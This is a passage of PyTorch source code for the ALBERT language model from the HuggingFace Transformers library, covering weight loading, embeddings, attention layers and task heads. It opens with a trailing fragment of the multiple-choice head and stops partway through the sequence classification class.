= position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None inputs_embeds = ( inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1)) if inputs_embeds is not None else None ) outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) reshaped_logits = logits.view(-1, num_choices) loss = None if labels is not None: loss_fct = CrossEntropyLoss() loss = loss_fct(reshaped_logits, labels) if not return_dict: output = (reshaped_logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return MultipleChoiceModelOutput( loss=loss, logits=reshaped_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, )
# coding=utf-8 # Copyright 2018 Google AI, Google Brain and the HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """PyTorch ALBERT model. """ import math import os from dataclasses import dataclass from typing import Optional, Tuple import torch from packaging import version from torch import nn from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss from ...activations import ACT2FN from ...file_utils import ( ModelOutput, add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, replace_return_docstrings, ) from ...modeling_outputs import ( BaseModelOutput, BaseModelOutputWithPooling, MaskedLMOutput, MultipleChoiceModelOutput, QuestionAnsweringModelOutput, SequenceClassifierOutput, TokenClassifierOutput, ) from ...modeling_utils import ( PreTrainedModel, apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer, ) from ...utils import logging from .configuration_albert import AlbertConfig logger = logging.get_logger(__name__) _CHECKPOINT_FOR_DOC = "albert-base-v2" _CONFIG_FOR_DOC = "AlbertConfig" _TOKENIZER_FOR_DOC = "AlbertTokenizer" ALBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [ "albert-base-v1", "albert-large-v1", "albert-xlarge-v1", "albert-xxlarge-v1", "albert-base-v2", "albert-large-v2", "albert-xlarge-v2", "albert-xxlarge-v2", # See all ALBERT models at https://huggingface.co/models?filter=albert ] def load_tf_weights_in_albert(model, config, tf_checkpoint_path): """Load tf checkpoints in a pytorch model.""" try: import re import numpy as np import tensorflow as tf except ImportError: logger.error( "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see " "https://www.tensorflow.org/install/ for installation instructions." ) raise tf_path = os.path.abspath(tf_checkpoint_path) logger.info(f"Converting TensorFlow checkpoint from {tf_path}") # Load weights from TF model init_vars = tf.train.list_variables(tf_path) names = [] arrays = [] for name, shape in init_vars: logger.info(f"Loading TF weight {name} with shape {shape}") array = tf.train.load_variable(tf_path, name) names.append(name) arrays.append(array) for name, array in zip(names, arrays): print(name) for name, array in zip(names, arrays): original_name = name # If saved from the TF HUB module name = name.replace("module/", "") # Renaming and simplifying name = name.replace("ffn_1", "ffn") name = name.replace("bert/", "albert/") name = name.replace("attention_1", "attention") name = name.replace("transform/", "") name = name.replace("LayerNorm_1", "full_layer_layer_norm") name = name.replace("LayerNorm", "attention/LayerNorm") name = name.replace("transformer/", "") # The feed forward layer had an 'intermediate' step which has been abstracted away name = name.replace("intermediate/dense/", "") name = name.replace("ffn/intermediate/output/dense/", "ffn_output/") # ALBERT attention was split between self and output which have been abstracted away name = name.replace("/output/", "/") name = name.replace("/self/", "/") # The pooler is a linear layer name = name.replace("pooler/dense", "pooler") # The classifier was simplified to predictions from cls/predictions name = name.replace("cls/predictions", "predictions") name = name.replace("predictions/attention", "predictions") # Naming was changed to be more explicit name = name.replace("embeddings/attention", "embeddings") name = name.replace("inner_group_", "albert_layers/") name = name.replace("group_", "albert_layer_groups/") # Classifier if len(name.split("/")) == 1 and ("output_bias" in name or "output_weights" in name): name = "classifier/" + name # No ALBERT model currently handles the next sentence prediction task if "seq_relationship" in name: name = name.replace("seq_relationship/output_", "sop_classifier/classifier/") name = name.replace("weights", "weight") name = name.split("/") # Ignore the gradients applied by the LAMB/ADAM optimizers. if ( "adam_m" in name or "adam_v" in name or "AdamWeightDecayOptimizer" in name or "AdamWeightDecayOptimizer_1" in name or "global_step" in name ): logger.info(f"Skipping {'/'.join(name)}") continue pointer = model for m_name in name: if re.fullmatch(r"[A-Za-z]+_\d+", m_name): scope_names = re.split(r"_(\d+)", m_name) else: scope_names = [m_name] if scope_names[0] == "kernel" or scope_names[0] == "gamma": pointer = getattr(pointer, "weight") elif scope_names[0] == "output_bias" or scope_names[0] == "beta": pointer = getattr(pointer, "bias") elif scope_names[0] == "output_weights": pointer = getattr(pointer, "weight") elif scope_names[0] == "squad": pointer = getattr(pointer, "classifier") else: try: pointer = getattr(pointer, scope_names[0]) except AttributeError: logger.info(f"Skipping {'/'.join(name)}") continue if len(scope_names) >= 2: num = int(scope_names[1]) pointer = pointer[num] if m_name[-11:] == "_embeddings": pointer = getattr(pointer, "weight") elif m_name == "kernel": array = np.transpose(array) try: if pointer.shape != array.shape: raise ValueError(f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched") except AssertionError as e: e.args += (pointer.shape, array.shape) raise print(f"Initialize PyTorch weight {name} from {original_name}") pointer.data = torch.from_numpy(array) return model class AlbertEmbeddings(nn.Module): """ Construct the embeddings from word, position and token_type embeddings. """ def __init__(self, config): super().__init__() self.word_embeddings = nn.Embedding(config.vocab_size, config.embedding_size, padding_idx=config.pad_token_id) self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.embedding_size) self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.embedding_size) # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load # any TensorFlow checkpoint file self.LayerNorm = nn.LayerNorm(config.embedding_size, eps=config.layer_norm_eps) self.dropout = nn.Dropout(config.hidden_dropout_prob) # position_ids (1, len position emb) is contiguous in memory and exported when serialized self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1))) self.position_embedding_type = getattr(config, "position_embedding_type", "absolute") if version.parse(torch.__version__) > version.parse("1.6.0"): self.register_buffer( "token_type_ids", torch.zeros(self.position_ids.size(), dtype=torch.long), persistent=False, ) # Copied from transformers.models.bert.modeling_bert.BertEmbeddings.forward def forward( self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0 ): if input_ids is not None: input_shape = input_ids.size() else: input_shape = inputs_embeds.size()[:-1] seq_length = input_shape[1] if position_ids is None: position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length] # Setting the token_type_ids to the registered buffer in constructor where it is all zeros, which usually occurs # when its auto-generated, registered buffer helps users when tracing the model without passing token_type_ids, solves # issue #5664 if token_type_ids is None: if hasattr(self, "token_type_ids"): buffered_token_type_ids = self.token_type_ids[:, :seq_length] buffered_token_type_ids_expanded = buffered_token_type_ids.expand(input_shape[0], seq_length) token_type_ids = buffered_token_type_ids_expanded else: token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device) if inputs_embeds is None: inputs_embeds = self.word_embeddings(input_ids) token_type_embeddings = self.token_type_embeddings(token_type_ids) embeddings = inputs_embeds + token_type_embeddings if self.position_embedding_type == "absolute": position_embeddings = self.position_embeddings(position_ids) embeddings += position_embeddings embeddings = self.LayerNorm(embeddings) embeddings = self.dropout(embeddings) return embeddings class AlbertAttention(nn.Module): def __init__(self, config): super().__init__() if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"): raise ValueError( f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention " f"heads ({config.num_attention_heads}" ) self.num_attention_heads = config.num_attention_heads self.hidden_size = config.hidden_size self.attention_head_size = config.hidden_size // config.num_attention_heads self.all_head_size = self.num_attention_heads * self.attention_head_size self.query = nn.Linear(config.hidden_size, self.all_head_size) self.key = nn.Linear(config.hidden_size, self.all_head_size) self.value = nn.Linear(config.hidden_size, self.all_head_size) self.attention_dropout = nn.Dropout(config.attention_probs_dropout_prob) self.output_dropout = nn.Dropout(config.hidden_dropout_prob) self.dense = nn.Linear(config.hidden_size, config.hidden_size) self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps) self.pruned_heads = set() self.position_embedding_type = getattr(config, "position_embedding_type", "absolute") if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query": self.max_position_embeddings = config.max_position_embeddings self.distance_embedding = nn.Embedding(2 * config.max_position_embeddings - 1, self.attention_head_size) # Copied from transformers.models.bert.modeling_bert.BertSelfAttention.transpose_for_scores def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def prune_heads(self, heads): if len(heads) == 0: return heads, index = find_pruneable_heads_and_indices( heads, self.num_attention_heads, self.attention_head_size, self.pruned_heads ) # Prune linear layers self.query = prune_linear_layer(self.query, index) self.key = prune_linear_layer(self.key, index) self.value = prune_linear_layer(self.value, index) self.dense = prune_linear_layer(self.dense, index, dim=1) # Update hyper params and store pruned heads self.num_attention_heads = self.num_attention_heads - len(heads) self.all_head_size = self.attention_head_size * self.num_attention_heads self.pruned_heads = self.pruned_heads.union(heads) def forward(self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) # Take the dot product between "query" and "key" to get the raw attention scores. attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) if attention_mask is not None: # Apply the attention mask is (precomputed for all layers in BertModel forward() function) attention_scores = attention_scores + attention_mask if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query": seq_length = hidden_states.size()[1] position_ids_l = torch.arange(seq_length, dtype=torch.long, device=hidden_states.device).view(-1, 1) position_ids_r = torch.arange(seq_length, dtype=torch.long, device=hidden_states.device).view(1, -1) distance = position_ids_l - position_ids_r positional_embedding = self.distance_embedding(distance + self.max_position_embeddings - 1) positional_embedding = positional_embedding.to(dtype=query_layer.dtype) # fp16 compatibility if self.position_embedding_type == "relative_key": relative_position_scores = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding) attention_scores = attention_scores + relative_position_scores elif self.position_embedding_type == "relative_key_query": relative_position_scores_query = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding) relative_position_scores_key = torch.einsum("bhrd,lrd->bhlr", key_layer, positional_embedding) attention_scores = attention_scores + relative_position_scores_query + relative_position_scores_key # Normalize the attention scores to probabilities. attention_probs = nn.Softmax(dim=-1)(attention_scores) # This is actually dropping out entire tokens to attend to, which might # seem a bit unusual, but is taken from the original Transformer paper. attention_probs = self.attention_dropout(attention_probs) # Mask heads if we want to if head_mask is not None: attention_probs = attention_probs * head_mask context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.transpose(2, 1).flatten(2) projected_context_layer = self.dense(context_layer) projected_context_layer_dropout = self.output_dropout(projected_context_layer) layernormed_context_layer = self.LayerNorm(hidden_states + projected_context_layer_dropout) return (layernormed_context_layer, attention_probs) if output_attentions else (layernormed_context_layer,) class AlbertLayer(nn.Module): def __init__(self, config): super().__init__() self.config = config self.chunk_size_feed_forward = config.chunk_size_feed_forward self.seq_len_dim = 1 self.full_layer_layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps) self.attention = AlbertAttention(config) self.ffn = nn.Linear(config.hidden_size, config.intermediate_size) self.ffn_output = nn.Linear(config.intermediate_size, config.hidden_size) self.activation = ACT2FN[config.hidden_act] self.dropout = nn.Dropout(config.hidden_dropout_prob) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False ): attention_output = self.attention(hidden_states, attention_mask, head_mask, output_attentions) ffn_output = apply_chunking_to_forward( self.ff_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output[0], ) hidden_states = self.full_layer_layer_norm(ffn_output + attention_output[0]) return (hidden_states,) + attention_output[1:] # add attentions if we output them def ff_chunk(self, attention_output): ffn_output = self.ffn(attention_output) ffn_output = self.activation(ffn_output) ffn_output = self.ffn_output(ffn_output) return ffn_output class AlbertLayerGroup(nn.Module): def __init__(self, config): super().__init__() self.albert_layers = nn.ModuleList([AlbertLayer(config) for _ in range(config.inner_group_num)]) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False ): layer_hidden_states = () layer_attentions = () for layer_index, albert_layer in enumerate(self.albert_layers): layer_output = albert_layer(hidden_states, attention_mask, head_mask[layer_index], output_attentions) hidden_states = layer_output[0] if output_attentions: layer_attentions = layer_attentions + (layer_output[1],) if output_hidden_states: layer_hidden_states = layer_hidden_states + (hidden_states,) outputs = (hidden_states,) if output_hidden_states: outputs = outputs + (layer_hidden_states,) if output_attentions: outputs = outputs + (layer_attentions,) return outputs # last-layer hidden state, (layer hidden states), (layer attentions) class AlbertTransformer(nn.Module): def __init__(self, config): super().__init__() self.config = config self.embedding_hidden_mapping_in = nn.Linear(config.embedding_size, config.hidden_size) self.albert_layer_groups = nn.ModuleList([AlbertLayerGroup(config) for _ in range(config.num_hidden_groups)]) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False, return_dict=True, ): hidden_states = self.embedding_hidden_mapping_in(hidden_states) all_hidden_states = (hidden_states,) if output_hidden_states else None all_attentions = () if output_attentions else None head_mask = [None] * self.config.num_hidden_layers if head_mask is None else head_mask for i in range(self.config.num_hidden_layers): # Number of layers in a hidden group layers_per_group = int(self.config.num_hidden_layers / self.config.num_hidden_groups) # Index of the hidden group group_idx = int(i / (self.config.num_hidden_layers / self.config.num_hidden_groups)) layer_group_output = self.albert_layer_groups[group_idx]( hidden_states, attention_mask, head_mask[group_idx * layers_per_group : (group_idx + 1) * layers_per_group], output_attentions, output_hidden_states, ) hidden_states = layer_group_output[0] if output_attentions: all_attentions = all_attentions + layer_group_output[-1] if output_hidden_states: all_hidden_states = all_hidden_states + (hidden_states,) if not return_dict: return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None) return BaseModelOutput( last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions ) class AlbertPreTrainedModel(PreTrainedModel): """ An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained models. """ config_class = AlbertConfig load_tf_weights = load_tf_weights_in_albert base_model_prefix = "albert" _keys_to_ignore_on_load_missing = [r"position_ids"] def _init_weights(self, module): """Initialize the weights.""" if isinstance(module, nn.Linear): # Slightly different from the TF version which uses truncated_normal for initialization # cf https://github.com/pytorch/pytorch/pull/5617 module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.bias is not None: module.bias.data.zero_() elif isinstance(module, nn.Embedding): module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.padding_idx is not None: module.weight.data[module.padding_idx].zero_() elif isinstance(module, nn.LayerNorm): module.bias.data.zero_() module.weight.data.fill_(1.0) @dataclass class AlbertForPreTrainingOutput(ModelOutput): """ Output type of :class:`~transformers.AlbertForPreTraining`. Args: loss (`optional`, returned when ``labels`` is provided, ``torch.FloatTensor`` of shape :obj:`(1,)`): Total loss as the sum of the masked language modeling loss and the next sequence prediction (classification) loss. prediction_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`): Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax). sop_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`): Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation before SoftMax). hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``): Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of shape :obj:`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus the initial embedding outputs. attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``): Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_heads, sequence_length, sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ loss: Optional[torch.FloatTensor] = None prediction_logits: torch.FloatTensor = None sop_logits: torch.FloatTensor = None hidden_states: Optional[Tuple[torch.FloatTensor]] = None attentions: Optional[Tuple[torch.FloatTensor]] = None ALBERT_START_DOCSTRING = r""" This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic methods the library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads etc.) This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__ subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and behavior. Args: config (:class:`~transformers.AlbertConfig`): Model configuration class with all the parameters of the model. Initializing with a config file does not load the weights associated with the model, only the configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights. """ ALBERT_INPUTS_DOCSTRING = r""" Args: input_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`): Indices of input sequence tokens in the vocabulary. Indices can be obtained using :class:`~transformers.AlbertTokenizer`. See :meth:`transformers.PreTrainedTokenizer.__call__` and :meth:`transformers.PreTrainedTokenizer.encode` for details. `What are input IDs? <../glossary.html#input-ids>`__ attention_mask (:obj:`torch.FloatTensor` of shape :obj:`({0})`, `optional`): Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``: - 1 for tokens that are **not masked**, - 0 for tokens that are **masked**. `What are attention masks? <../glossary.html#attention-mask>`__ token_type_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0, 1]``: - 0 corresponds to a `sentence A` token, - 1 corresponds to a `sentence B` token. `What are token type IDs? <../glossary.html#token-type-ids>`_ position_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0, config.max_position_embeddings - 1]``. `What are position IDs? <../glossary.html#position-ids>`_ head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`): Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``: - 1 indicates the head is **not masked**, - 0 indicates the head is **masked**. inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`({0}, hidden_size)`, `optional`): Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation. This is useful if you want more control over how to convert :obj:`input_ids` indices into associated vectors than the model's internal embedding lookup matrix. output_attentions (:obj:`bool`, `optional`): Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned tensors for more detail. output_hidden_states (:obj:`bool`, `optional`): Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for more detail. return_dict (:obj:`bool`, `optional`): Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple. """ @add_start_docstrings( "The bare ALBERT Model transformer outputting raw hidden-states without any specific head on top.", ALBERT_START_DOCSTRING, ) class AlbertModel(AlbertPreTrainedModel): config_class = AlbertConfig base_model_prefix = "albert" def __init__(self, config, add_pooling_layer=True): super().__init__(config) self.config = config self.embeddings = AlbertEmbeddings(config) self.encoder = AlbertTransformer(config) if add_pooling_layer: self.pooler = nn.Linear(config.hidden_size, config.hidden_size) self.pooler_activation = nn.Tanh() else: self.pooler = None self.pooler_activation = None # Initialize weights and apply final processing self.post_init() def get_input_embeddings(self): return self.embeddings.word_embeddings def set_input_embeddings(self, value): self.embeddings.word_embeddings = value def _prune_heads(self, heads_to_prune): """ Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} ALBERT has a different architecture in that its layers are shared across groups, which then has inner groups. If an ALBERT model has 12 hidden layers and 2 hidden groups, with two inner groups, there is a total of 4 different layers. These layers are flattened: the indices [0,1] correspond to the two inner groups of the first hidden layer, while [2,3] correspond to the two inner groups of the second hidden layer. Any layer with in index other than [0,1,2,3] will result in an error. See base class PreTrainedModel for more information about head pruning """ for layer, heads in heads_to_prune.items(): group_idx = int(layer / self.config.inner_group_num) inner_group_idx = int(layer - group_idx * self.config.inner_group_num) self.encoder.albert_layer_groups[group_idx].albert_layers[inner_group_idx].attention.prune_heads(heads) @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=BaseModelOutputWithPooling, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions output_hidden_states = ( output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states ) return_dict = return_dict if return_dict is not None else self.config.use_return_dict if input_ids is not None and inputs_embeds is not None: raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") elif input_ids is not None: input_shape = input_ids.size() elif inputs_embeds is not None: input_shape = inputs_embeds.size()[:-1] else: raise ValueError("You have to specify either input_ids or inputs_embeds") batch_size, seq_length = input_shape device = input_ids.device if input_ids is not None else inputs_embeds.device if attention_mask is None: attention_mask = torch.ones(input_shape, device=device) if token_type_ids is None: if hasattr(self.embeddings, "token_type_ids"): buffered_token_type_ids = self.embeddings.token_type_ids[:, :seq_length] buffered_token_type_ids_expanded = buffered_token_type_ids.expand(batch_size, seq_length) token_type_ids = buffered_token_type_ids_expanded else: token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device) extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2) extended_attention_mask = extended_attention_mask.to(dtype=self.dtype) # fp16 compatibility extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0 head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers) embedding_output = self.embeddings( input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds ) encoder_outputs = self.encoder( embedding_output, extended_attention_mask, head_mask=head_mask, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = encoder_outputs[0] pooled_output = self.pooler_activation(self.pooler(sequence_output[:, 0])) if self.pooler is not None else None if not return_dict: return (sequence_output, pooled_output) + encoder_outputs[1:] return BaseModelOutputWithPooling( last_hidden_state=sequence_output, pooler_output=pooled_output, hidden_states=encoder_outputs.hidden_states, attentions=encoder_outputs.attentions, ) @add_start_docstrings( """ Albert Model with two heads on top as done during the pretraining: a `masked language modeling` head and a `sentence order prediction (classification)` head. """, ALBERT_START_DOCSTRING, ) class AlbertForPreTraining(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.predictions = AlbertMLMHead(config) self.sop_classifier = AlbertSOPHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @replace_return_docstrings(output_type=AlbertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, sentence_order_label=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` sentence_order_label (``torch.LongTensor`` of shape ``(batch_size,)``, `optional`): Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see :obj:`input_ids` docstring) Indices should be in ``[0, 1]``. ``0`` indicates original order (sequence A, then sequence B), ``1`` indicates switched order (sequence B, then sequence A). Returns: Example:: >>> from transformers import AlbertTokenizer, AlbertForPreTraining >>> import torch >>> tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2') >>> model = AlbertForPreTraining.from_pretrained('albert-base-v2') >>> input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1 >>> outputs = model(input_ids) >>> prediction_logits = outputs.prediction_logits >>> sop_logits = outputs.sop_logits """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output, pooled_output = outputs[:2] prediction_scores = self.predictions(sequence_output) sop_scores = self.sop_classifier(pooled_output) total_loss = None if labels is not None and sentence_order_label is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) sentence_order_loss = loss_fct(sop_scores.view(-1, 2), sentence_order_label.view(-1)) total_loss = masked_lm_loss + sentence_order_loss if not return_dict: output = (prediction_scores, sop_scores) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return AlbertForPreTrainingOutput( loss=total_loss, prediction_logits=prediction_scores, sop_logits=sop_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) class AlbertMLMHead(nn.Module): def __init__(self, config): super().__init__() self.LayerNorm = nn.LayerNorm(config.embedding_size) self.bias = nn.Parameter(torch.zeros(config.vocab_size)) self.dense = nn.Linear(config.hidden_size, config.embedding_size) self.decoder = nn.Linear(config.embedding_size, config.vocab_size) self.activation = ACT2FN[config.hidden_act] self.decoder.bias = self.bias def forward(self, hidden_states): hidden_states = self.dense(hidden_states) hidden_states = self.activation(hidden_states) hidden_states = self.LayerNorm(hidden_states) hidden_states = self.decoder(hidden_states) prediction_scores = hidden_states return prediction_scores def _tie_weights(self): # To tie those two weights if they get disconnected (on TPU or when the bias is resized) self.bias = self.decoder.bias class AlbertSOPHead(nn.Module): def __init__(self, config): super().__init__() self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, config.num_labels) def forward(self, pooled_output): dropout_pooled_output = self.dropout(pooled_output) logits = self.classifier(dropout_pooled_output) return logits @add_start_docstrings( "Albert Model with a `language modeling` head on top.", ALBERT_START_DOCSTRING, ) class AlbertForMaskedLM(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config, add_pooling_layer=False) self.predictions = AlbertMLMHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MaskedLMOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_outputs = outputs[0] prediction_scores = self.predictions(sequence_outputs) masked_lm_loss = None if labels is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) if not return_dict: output = (prediction_scores,) + outputs[2:] return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output return MaskedLMOutput( loss=masked_lm_loss, logits=prediction_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled output) e.g. for GLUE tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForSequenceClassification(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.config = config self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, 